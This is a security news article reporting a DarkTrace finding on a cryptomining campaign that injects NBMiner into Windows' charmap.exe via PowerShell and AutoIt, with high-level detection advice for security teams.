Security teams are raising the alarm over a new cryptomining malware campaign that takes an unusual route to stay hidden: it runs inside the Windows Character Map application (charmap.exe).

Researchers say the technique makes the attack far harder to detect, since the malicious miner operates from a trusted Microsoft process instead of a suspicious standalone file.

How the Attack Starts

The attack chain begins with a simple but dangerous move. A compromised workstation reaches out to an obscure external server and quietly downloads a PowerShell script named infect.ps1.

DarkTrace analysts spotted this behavior after noticing a new PowerShell user agent fingerprint, which immediately raised red flags. Once executed, the script unpacks several encoded blobs of data, reconstructs an AutoIt binary, and plants it in the user’s AppData folder. To make sure it survives reboots, the malware adds a shortcut in the startup directory.

Screenshot of the ‘infect.ps1’ PowerShell script observed in the attack (Source - DarkTrace)
Screenshot of the ‘infect.ps1’ PowerShell script observed in the attack (Source – DarkTrace)

Stealthy Tricks at Every Stage

This isn’t a run-of-the-mill cryptojacker. The threat actor has built in multiple evasion layers to avoid common defenses:

  • Runs entirely in memory, leaving little behind on disk.

  • Uses UAC bypass techniques to escalate privileges.

  • Leverages registry checks to blend in with normal Windows activity.

  • Injects itself into charmap.exe, a program no one would expect to host malicious code.

By piggybacking on charmap.exe, the malware slips past Windows Defender’s signature checks, keeping mining operations under the radar.

The Payload: NBMiner

Once inside, the malware launches NBMiner, a well-known crypto mining tool, tuned for the KawPoW algorithm.

It then connects to external mining pools like ravenminer.com and other suspicious endpoints. For victims, the signs aren’t subtle: systems slow down, CPU usage spikes, and electricity bills climb — all without obvious clues pointing to malware.

Screenshot of second stage AutoIt script (Source - DarkTrace)
Screenshot of second stage AutoIt script (Source – DarkTrace)

Why This Attack Matters

This campaign highlights how far cryptojacking tactics have come. Instead of dropping noisy files on disk, the attacker chains together PowerShell, AutoIt, persistence tricks, and legitimate process injection.

The result is a fileless, persistent miner that’s much harder for traditional antivirus to catch.

What Security Teams Should Do

  • Watch for unusual PowerShell behavior and strange user agents.

  • Investigate spikes in CPU usage or power costs that can’t be explained.

  • Deploy behavioral monitoring tools that go beyond signature scans.

This isn’t just about mining coins in the background — it’s a reminder that adversaries are constantly finding new ways to exploit trusted Windows components for profit.

Final Thoughts

The abuse of Windows Character Map shows how creative attackers have become in hiding their tracks. For organizations, this incident is another wake-up call: defending against cryptomining isn’t just about blocking miners, it’s about spotting the unusual behaviors that give them away.

Source: cybersecuritynews